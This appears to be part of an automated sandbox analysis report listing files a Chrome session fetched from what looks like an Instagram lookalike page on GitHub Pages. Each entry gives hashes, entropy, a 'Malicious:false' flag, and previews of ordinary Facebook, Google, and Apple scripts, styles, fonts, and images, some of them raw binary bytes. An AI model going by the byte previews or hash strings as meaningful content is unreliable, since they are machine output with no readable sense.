                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://sayidanur.github.io/instagram.com/img/googleplay-button.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...4...........t.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs...#...#.x.?v....tIME.......LIJ.....bKGD............&!IDATx.......;qT.$...E..qx.#"(..."!.u%..C0..D....r.(.k.I`...!.G1..M|.....<.%" ....b...35)..{.nUWW.. 3]]}.......D$.../...UW]5n.Q......B.!....z....a.EB...2q..5s........!..BH.f........>|.w...X....C.!..8.c`.'6......w66!..B....I...De.N......=[F..-....N.:.i.....!..B...i........y......E......cY... 18...B.!.D...V&M.T0.&Hj|e.k..&...!..B....i.y.A.%.+...A}..ac.B.!$v........q.3Af0...&..BH...w~..FIh.....B.!..3..-5H....L...B.!$m....'.......y3.!..BH.sj0..)4......$..BHZ@.BQ...q'.sj6!..B.$\(J...h....B.!i.]..+.8.Ah.j...L.!..4..^....3fa..8..0>..#..BH.i...B3y...B..M.n"..BH).;a.v^h.!....|.."..BHZ.1b..Q..g.*....B.!...wM..g..?C.!..BH)M...B.!.BC.!..B.!..B....B.!.BC.!..B....B.!.BC.!..B.!..B...BC2GMM..5K.-[&.7o..>......O>)#G....J.}...L....}.6......B..s........w.}.r.J.c.............*~....D.I.c..I...$....t..r..rh.&<.e.:
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):326
                                                                                                                                                                                                                                Entropy (8bit):7.260242399614157
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:Ok5ZTz+FyXIzvulGnFYqS8R85GZTb0FvSowvpbRcp2gHNuXmr4ntIyJtoTwO3byl:LzSAXIzvu4FYqU8ZX0F6owRcp2rsAtM4
                                                                                                                                                                                                                                MD5:6A4B15D70049AD2B6B2F67CDF08C885D
                                                                                                                                                                                                                                SHA1:A52320107374D519D13397D2172236F4526EB7E6
                                                                                                                                                                                                                                SHA-256:6213DCD17B474412DADFCF36A834F53E185A8DE8F9355AA51C632F6A025E0B20
                                                                                                                                                                                                                                SHA-512:8002BE9302A602D66746EC7B8A0DE89BD27E58938EBAD206C90FAAC00898D44D29BA6F699A8CBC4A20BEE42013E69B896ABF17BAFBB83A29658FBC1B81D14BF5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw
                                                                                                                                                                                                                                Preview:RIFF>...WEBPVP8L1.../?....\[.=z.*+}...T....m.mk<s...~.|..ED.'@.3.X....MQ%...B.....t..Z.Z4C0bJ=,....T}0..0...M...{.R...g.P...p#....7..U.&C(...Q^.|.i1.kRa.j..T...:..a;*X......h.G~.....+y~.UU>?.....3..t...j.ZTC@.)...j.....}#...o.b.&...@..oeb...at.[Y...e.:{K.cI.M.|....}..)...]p.1nE...".^."[P..;..gU..>.v...<G....
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (56486)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):57874
                                                                                                                                                                                                                                Entropy (8bit):5.27812742704802
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:6QxJPpoj1J3s106OigQTl0Xh3mPv798TK/67qKMK3R3ygtQTvT:toj1JccGl0XCNgtQTL
                                                                                                                                                                                                                                MD5:72194A5236771968F3CE2BAA7E07754F
                                                                                                                                                                                                                                SHA1:62835C6784EB00F0A01B5235D002EB3F636746EF
                                                                                                                                                                                                                                SHA-256:C340D2D25E2FAE8A64AF6AFD99A5D50D42EDA8C0602332345E67FE2487C612D3
                                                                                                                                                                                                                                SHA-512:EC18040A10CD59A440A1B5DE3BB47F5D608DA48249D0E6B0E9EA5D7E6100E47601DC70DA4222F74B60DDD983DECF2BD41F1741F455490297A81D9E4EC7874927
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/9cisb7Fe7ih/. */.__d("hoist-non-react-statics-2.5.0",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.hoistNonReactStatics=c()})(this,function(){var a={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},b={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},c=Object.defineProperty,d=Object.getOwnPropertyNames,e=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,g=Object.getPrototypeOf,h=g&&g(Object);return function i(j,k,l){if(typeof k!=="string"){if(h){var m=g(k);m&&m!==h&&i(j,m,l)}m=d(k);e&&(m=m.concat(e(k)));for(var n=0;n<m.length;++n){var o=m[n];if(!a[o]&&!b[o]&&(!l||!l[o])){var p=f(k,o);try{c(j,o,p)}catch(a){}}}return j}return j}})}var j=!1;function k(){j||(j=!0,i());return h.expor
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11900
                                                                                                                                                                                                                                Entropy (8bit):7.979698894528496
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4nitZWZDB4m2Rme8rwDV0Bn5+oov6ijiWJmCHxgNaj3AG5YeaRvmx6h2M:0IkdB4mQTDSRyiWJmCHxwGq/
                                                                                                                                                                                                                                MD5:5F95006BFED89D91C40C9F8EB0572EB3
                                                                                                                                                                                                                                SHA1:CB766FD85C02E2BE451D2A105DCC1BABB6F60E85
                                                                                                                                                                                                                                SHA-256:61AAE5B6BB1C1334CE83F1D6D20BFCF9ED04C2936ACA95EE46CA71148C5ABDB3
                                                                                                                                                                                                                                SHA-512:AED17F152F5899411369D1A82EA368F8BB8CAE881D1C8CD82A3D78B1B48AE70C5F53D1457A91530A4D17BF5F27AB344D33DAD2E70587150D5AA9F435173F17A2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFFt...WEBPVP8X..............VP8 .-.......*....>.N.I$"!..T.......-...g.O........?77.....P.r.....m.{.........7..~...{......m.......oL_e?A.._......|'.u...o.o.....G....{.s.....?.hO............{.G....Z...l....y......Q.......n......O..........G.w....?..g.....w........z..(......k...s.!.B..!...1.c..1.c..Z.:i..W.%5{c03I..Wk....6;.v...s.y.7'.CL......~X.!.).......r%7..........."...3{..W..c..E.}.MZ..,.Z....N....~o.'.ZT...B..!.Gw.1.[.1.r...2.G~.Ul..wBwp....piA...[-KS,1.@-#.2ikq..#....{.$..Q=...@p>^+.h.......fy.h.o..............%8........u.Ri..o..Q......Wn7..'...f.ya...J?.c.^<.|..?.u..b..!...D(A...a..*.2+KJ...D.[....,_..W._C.(s..`J.....`.d..by1.>...OR....uL;..&......Z9..^...3..>...qV4X..CF..*....a.gh"..!...K.e.V....%I.".*/R`&.6...e6...u!To..>B.U...7....(f.*..I......p.KR_.c.....0.;.h8.Kq!.\.{<S......FJ...q|....|..y..y.....,.(..W..A..y.xR...s.0$f..0..(Y._..Jm.G.m[,...S(.....+h...@m.....a..H..`vd.t..}.9w5C-.....5......*....jR.i.....k..oT......7]pg7..O%..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1189
                                                                                                                                                                                                                                Entropy (8bit):4.4877009445301965
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:t4pt6kwjNllHfeyQTGWug+7V1AUczWf66yad1VDheBK8bwoN5L+:o0k+8TOg2Pf6y1ZhkrwoNV+
                                                                                                                                                                                                                                MD5:61226AFCAE6A8F2B3D2755728DAAF4F2
                                                                                                                                                                                                                                SHA1:8489CAF428F9F579A8B31AEAD973F6C361711414
                                                                                                                                                                                                                                SHA-256:47EAAEA809BFE2FD94F78F3C94372B6328F37748BC0EEDFD1B2AB937027962CB
                                                                                                                                                                                                                                SHA-512:C1F23A9E1555C1BDB558781327EE018F2825C2C2238945866351DA248CD39FF9102D729078A47040BB00516CFADFD2B5EF2C88B661A76563A65553B7C7421FC4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 230.5 230.5" version="1.1"><path fill="none" stroke="#000" stroke-linejoin="round" stroke-miterlimit="1.41" stroke-opacity=".1" stroke-width="1" d="M158.22 230H72.28l-8.22-.01a320 320 0 0 1-6.93-.11c-5.05-.06-10.09-.5-15.07-1.32a50.83 50.83 0 0 1-14.33-4.73 48.2 48.2 0 0 1-21.07-21.06 50.85 50.85 0 0 1-4.72-14.34 100.68 100.68 0 0 1-1.33-15.07c-.06-2.31-.1-4.62-.1-6.93-.02-2.74-.02-5.48-.02-8.22V72.29c0-2.75 0-5.48.02-8.23a320 320 0 0 1 .1-6.93c.06-5.05.5-10.08 1.33-15.06a50.74 50.74 0 0 1 4.72-14.34A48.2 48.2 0 0 1 27.74 6.66a51.02 51.02 0 0 1 14.33-4.73C47.05 1.12 52.09.67 57.14.61a320 320 0 0 1 6.93-.1L72.3.5h85.92l8.23.01a320 320 0 0 1 6.92.1c5.06.07 10.1.5 15.08 1.33 4.98.85 9.81 2.45 14.33 4.72a48.19 48.19 0 0 1 21.07 21.07 50.9 50.9 0 0 1 4.72 14.34c.82 4.98 1.27 10.02 1.33 15.07a320 320 0 0 1 .1 6.92l.01 3.48v94.09l-.01 4.8c-.01 2.3-.05 4.62-.1 6.93-.07 5.05-.5 10.08-1.33 15.07a50.68 50.68 0 0 1-4.7
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1742
                                                                                                                                                                                                                                Entropy (8bit):7.820992169073267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2DECnya3DoHbgWDhmQf/yeD/B9lJ8o/Oq5/QrKC:2fyWDoPdmQi/oW66
                                                                                                                                                                                                                                MD5:1DAA25F8D01003B26FD5F64ECFF8F51C
                                                                                                                                                                                                                                SHA1:AFC48CED8ABC73EC0F2DC97B5F47A346045F0B10
                                                                                                                                                                                                                                SHA-256:71A38FEFCC6A457B90792E4CA0DF829519A4FA3197B9C871D8BF43C83F0AC374
                                                                                                                                                                                                                                SHA-512:232D4199F34B02BF322B8862A218E15FC9E7DDBED9B06E9B3C203766D52898355E8A8AC14A5969E3BF3566B7D38F761AAA26380FD895EEFB0FB2390143D714CE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 D....$...*....>.D.G."!.8mX4.D..p.H.7...w.o....=.#._................y..G..?................/..h.....GN._/..sE..m....V8bB+(..e....'].Rf..CN..+.....9.(5i!k.....P...@8...5.h.r....o.L.s.>o.f<...,qP..N...O.........c7o.....^E....n.E..g......(... ....zP.pC3U...Z...1~w.A2.N.]).\.d..n71....f .g.?..........=..?.._(..(C..2....E.D!....c..,.`Z..ULu.u?.#.._C.~O+...\9I...S.]~...!........a..b.^.ftn.h..j.....UP..g...Z.xX6..fK}#..3.<...4`....s.AJ.5.7V.1.,.(N>...WR..!D.....t[?..ko.M..'.$.K............jN.s...y......(...+.8.....t^....].ngh6qw....y..8..R..^|J.h.X.`P.}.Za.U.\....Ss..>...z....]J.i.a.c.V..?qq...%/].'.MHpq.\{$zq.*.....Ob.F...P...4q.....e.../......-...6...d...bv........VI...})..:..V....1.S.SN.....m.......UEO.t*....j....J.z.P0.,-4...&..nz.%..y...>pF'i...[P..ne....F...QB.;..Q .. .\h...-..U.......!........F./....q.....|4rh.2 U....RI.;. +t...4..}.......:.hXC..%.2k...0...V5$d4<ZP+../..)>0.:W....P+...[..y....=.T..[...).
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1881)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):42032
                                                                                                                                                                                                                                Entropy (8bit):5.436259422203893
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:TBKiTA/pZGZJmpQbAFSSCN5VoEmp8oQDt+U9JU7vvc/sl0ov09MCDTVMrhvUVsbN:aTGZgCNDv+eUlsDTYhvYQ/gCqehTPUgV
                                                                                                                                                                                                                                MD5:6A62C13FDFCB467B2953F9CCEDCCF523
                                                                                                                                                                                                                                SHA1:D5CCD0646CEB76A56954BE1016FD1EB65E17D10F
                                                                                                                                                                                                                                SHA-256:6AF490BACF55B2D6858CA35B3F40E659E49E320D715BE00E669ED6371F6FC00A
                                                                                                                                                                                                                                SHA-512:610FB3519E13CDC8DE5EDEA21604BD112CE6E962566514174DA046D6FA12705292D1F2C91539EF177F66FC1CE9C9FCAB1AE0989852775994C037CBA27BB24628
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=_b,_tp/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=byfTOb,lsjVmc,LEikZe"
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.Hqa=function(a){let b=0;for(const c in a)b++;return b};_.Iqa=function(a,b){for(const c in a)if(a[c]==b)return!0;return!1};_.Jqa=function(a){return a.Kh&&typeof a.Kh=="function"?a.Kh():_.da(a)||typeof a==="string"?a.length:_.Hqa(a)};._.Sn=function(a){if(a.Ci&&typeof a.Ci=="function")return a.Ci();if(typeof Map!=="undefined"&&a instanceof Map||typeof Set!=="undefined"&&a instanceof Set)return Array.from(a.values());if(typeof a==="string")return a.split("");if(_.da(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.Va(a)};._.Kqa=function(a){if(a.tn&&typeof a.tn=="function")return a.tn();if(!a.Ci||typeof a.Ci!="function"){if(typeof Map!=="undefined"&&a instanceof Map)return Array.from(a.keys());if(!(typeof Set!=="undefined"&&a instanceof Set)){if(_.da(a)||typeof a==="string"){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.Wa(a)}}};.var Lqa,Mqa,Nqa
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):21057
                                                                                                                                                                                                                                Entropy (8bit):4.806084471510432
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E38lrSKuiR7n74LAUo5NtBmUhBeIyY0xHUjU3:q8lrSKuiB74LAUo5NtBmUhBeIyY0xHU0
                                                                                                                                                                                                                                MD5:E58F2133D9AE2B6F5C8E1CBF56319085
                                                                                                                                                                                                                                SHA1:0FC4141498E8486FDAA29F4D57FE89E9A4EC56F9
                                                                                                                                                                                                                                SHA-256:DBA40B09DD034C3C9483680AF24BDDDEC7B910E3CBB6F908BCBF8552F8C7819D
                                                                                                                                                                                                                                SHA-512:F738972BBC413C68FA88693B9DD885BEDE49278A37DF1D224E058FE50BE0CC20F9E129D871D40E5E2F5BFF266111E8873D305A3B559B2A9A22EAB06C57A47826
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/api-www/global-elements/global-header/v1/flyouts?locale=en_UZ
                                                                                                                                                                                                                                Preview:[{"id":"3d39a8ff","name":"apple","analyticsAttributes":[{"name":"data-analytics-title","value":"apple home"}]},{"id":"a5e87de9","name":"mac","baseGroups":[{"id":"5bdb085b","title":"More from Mac","analyticsAttributes":[{"name":"data-analytics-region","value":"more from mac"}],"baseLinks":[{"analyticsAttributes":[{"name":"data-analytics-exit-link","value":"true"},{"name":"data-analytics-title","value":"mac support"}],"text":"Mac Support","url":"https://support.apple.com/en-uz/mac?cid=gn-ols-mac-psp-prodfly","ariaLabel":"","id":"c07886de"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"continuity"}],"text":"Continuity","url":"/uz/macos/continuity/","ariaLabel":"","id":"b204e51d"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"icloud+"}],"text":"iCloud+","url":"/uz/icloud/","ariaLabel":"","id":"51c89dd2"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"mac for business"}],"text":"Mac for Business","url":"/uz/business/mac/","ariaLabel":"","
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12513)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13517
                                                                                                                                                                                                                                Entropy (8bit):5.314863543101727
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:8nlFipHnQ5/BRZJ/bzwT62waHKsR5ssRaREW+ou:8lF2HQ5JRjbQw9sRasROEWY
                                                                                                                                                                                                                                MD5:24F387A60FE0B05A15426D721C397D47
                                                                                                                                                                                                                                SHA1:012EB578C3C097193F20F123732AC646D2800096
                                                                                                                                                                                                                                SHA-256:6AD8C8A703856136FEA1D1911FE8C0E09BCE87EDE20F4C8B98AB8F8961462738
                                                                                                                                                                                                                                SHA-512:787E1A2BCCBCD973135E53B53FA5BC89E59AC277D95F30B0595B225667B1F0DEB6616914915200ABB6E522DDEA144E2EEF140876CA502D1317E13E86E63DA9A1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const e="musickit-components";let t,n,l,s=!1,o=!1,i=!1,r=!1,c=null,f=!1;const a="undefined"!=typeof window?window:{},u=a.document||{head:{}},d={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e,t)},p=e=>Promise.resolve(e),$=(()=>{try{return new CSSStyleSheet,"function"==typeof(new CSSStyleSheet).replaceSync}catch(e){}return!1})(),m=(e,t,n)
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 34108, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):34108
                                                                                                                                                                                                                                Entropy (8bit):7.993096562158293
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:768:xDa3S2Rdcc3/k1/3Sr8dgfqHwQGMIto3/fIpos4GbtJzxn:xu3SQ3e/3S43TUtoP4Ftn
                                                                                                                                                                                                                                MD5:C15D33A9508923BE839D315A999AB9C7
                                                                                                                                                                                                                                SHA1:D17F6E786A1464E13D4EC8E842F4EB121B103842
                                                                                                                                                                                                                                SHA-256:65C99D3B9F1A1B905046E30D00A97F2D4D605E565C32917E7A89A35926E04B98
                                                                                                                                                                                                                                SHA-512:959490E7AE26D4821170482D302E8772DD641FFBBE08CFEE47F3AA2D7B1126DCCD6DEC5F1448CA71A4A8602981966EF8790AE0077429857367A33718B5097D06
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/googlesans/v58/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                Preview:wOF2.......<..........................................\..4?HVAR.t.`?STAT..'...J/<.....`..(..Z.0..,.6.$.... ..B..K..[.h...c.....nC .../.V.v..6>nT.*R...b.8.@.......ON.ch.......k..."..".9..\D...JBJ."T%5...Z2..Q.)wJ...sA.h..m....n..F.....t..ig.=..y.s@............t..j.*....n.h(...........N..)9.....v`|z....8.7..kTq....^.......[.K.O..1ZP.....;.HP.......>..+..j:.V.......A......[.f.l..v`x....F_..vo...e....n...H..X.2.v}...(.1J...x.....}.....5.3.....?..?..7...S..0.9..C.0.M..M9..e.b....bc..b4.0"e.G.....XT....z............E'c.(."...x`].]..e.rQ..ye.z........kFh;....Y.yPt.._Q.._-q..mi.Og.W.-qUI*...m5..r.mvA~o....S.f........s..ql.aXD...H..wy.P..k...f$.V^.2...8U{...f.....]]..G..cf.......D.c&B'S.2~..N..........R;..).5...../... 6....b....]d6."C..T..........OI\+V'...E.[.g.u.E....,*!F.....*U.q. :x.s..1..C....H..S%..)....h......K..........pw.f...f.......an3....9....@......%.2.c.+........cXD..F...B.....0'...O.z8.B....4...\..&c...H....;..p....@.l...:........L..`...5..xo&.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):110752
                                                                                                                                                                                                                                Entropy (8bit):5.4453482459935545
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:FxQl5so8Bthsn4mVdTHO6HcXz9MXYfxD0uDogzOnUsB4w7+Wf:Fx88BwpQCXOx7Wf
                                                                                                                                                                                                                                MD5:68FC27BF81FA90D31F7143F89C3D3A27
                                                                                                                                                                                                                                SHA1:7E1177E3705594AA852550D574CE0FB83BFD7D73
                                                                                                                                                                                                                                SHA-256:4E54960D38B8C65EC473828F158070BC6FFFB049F281A0C13DEF7D99D3CD4205
                                                                                                                                                                                                                                SHA-512:23B8C64FB950548574F2886D33D84D29C3BA703CECD70A68358A4E4E53A401453FC66E0B26112E725FA76A8E8AFB1AD5967A580B077B03EECE695CA2A305DB1D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/ziNkdVTlV4m.css"
                                                                                                                                                                                                                                Preview:._ai7j{overflow:visible;position:relative}._ai7k._ai7m ._ai7o{margin-left:8px}@keyframes BUIButtonBusyIndicatorFadeIn{0%{opacity:0}100%{opacity:1}}._ai7l._ai7m ._ai7o{animation:BUIButtonBusyIndicatorFadeIn 1 200ms cubic-bezier(.08,.52,.52,1);display:flex;left:50%;pointer-events:none;position:absolute;top:50%;transform:translate(-50%, -50%);z-index:1}._ai7l>*>*:not(._ai7o):not(._ai7p){transition:opacity 200ms cubic-bezier(.08,.52,.52,1)}._ai7l._ai7n>*>*:not(._ai7o):not(._ai7p){opacity:0}._ai7l{outline:none}._ai7p{bottom:-1px;box-shadow:0 0 0 2px currentColor;left:-1px;position:absolute;right:-1px;top:-1px}.@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:local('Roboto'), local('Roboto-Regular'), url(/rsrc.php/yH/r/c_1vdG88uNh.woff2) format('woff2'), url(/rsrc.php/yN/r/KKlOyJQcRfr.woff) format('woff')}@font-face{font-family:'Roboto';font-style:italic;font-weight:400;src:local('Roboto Italic'), local('Roboto-Italic'), url(/rsrc.php/yh/r/pXADmoqqN0T.woff2) format('woff
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (54502), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):54685
                                                                                                                                                                                                                                Entropy (8bit):4.949096357757183
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:OS7p4X4HeZvR3b8uuXTxXhfdjiXcOEvezvee/5NVwA1NAGBAf5TTCE6/iSphWhOb:OS7p4X4HeZvR3b8uuXTxXhfdjiXcOEvM
                                                                                                                                                                                                                                MD5:89780A9D2EEDFF61551113850A3547EF
                                                                                                                                                                                                                                SHA1:6365051BAD2052F07E30706797A161704731F33B
                                                                                                                                                                                                                                SHA-256:590B2F2F1C0CAFB359841C32F78516FD3352C9DE82B0E2F1A0132BE6DCF035E6
                                                                                                                                                                                                                                SHA-512:10B39022616F57E3FD8371FCC0D2ACE5F55552FD6938719BAE712E48710564A4D7025BA9AEF362F5366D4D2CCF069C1CF45B06F34A2FFA4D9F996D94C8230FA1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/global-elements/2426.0.0/en_UZ/ac-global-footer.89780a9d2eedff61551113850a3547ef.css
                                                                                                                                                                                                                                Preview:@font-face{font-family:"Apple Legacy Chevron";font-style:normal;font-weight:100;src:local("\f8ff"),url("../assets/ac-footer/legacy/appleicons_ultralight.woff") format("woff"),url("../assets/ac-footer/legacy/appleicons_ultralight.ttf") format("truetype")}@font-face{font-family:"Apple Icons 100";src:url("../assets/ac-footer/legacy/appleicons_ultralight.eot")}@font-face{font-family:"Apple Legacy Chevron";font-style:normal;font-weight:200;src:local("\f8ff"),url("../assets/ac-footer/legacy/appleicons_thin.woff") format("woff"),url("../assets/ac-footer/legacy/appleicons_thin.ttf") format("truetype")}@font-face{font-family:"Apple Icons 200";src:url("../assets/ac-footer/legacy/appleicons_thin.eot")}@font-face{font-family:"Apple Legacy Chevron";font-style:normal;font-weight:300;src:local("\f8ff"),url("../assets/ac-footer/legacy/appleicons_thin.woff") format("woff"),url("../assets/ac-footer/legacy/appleicons_thin.ttf") format("truetype")}@font-face{font-family:"Apple Icons 300";src:url("../asset
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (16042)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):182311
                                                                                                                                                                                                                                Entropy (8bit):5.451905341264212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:nxgSNPtIa33ZDcnkoSyOjb4SVPkFKsoP90Cls+j5ppjKa:q0kRG
                                                                                                                                                                                                                                MD5:84D2537133FE5ECA4A2637D15B9825DC
                                                                                                                                                                                                                                SHA1:B5D7E28F8E7278EC8ED139B4BBACEB233268E7B3
                                                                                                                                                                                                                                SHA-256:02B230AE382133BF1CC981246A730C3B33E81DFCD17E9A1AA4991939631981FD
                                                                                                                                                                                                                                SHA-512:06E11485B2CE0C08FF1526B713997BE6BAA8763E0E169EB3B52CF6F782F96E92A9AD6E89908EDD1F099C40CDF2F5D720DAFDD31010E6BE7CD3A81F3E62289CA0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ievD4/yP/l/en_GB/-F9g11XP17c.js
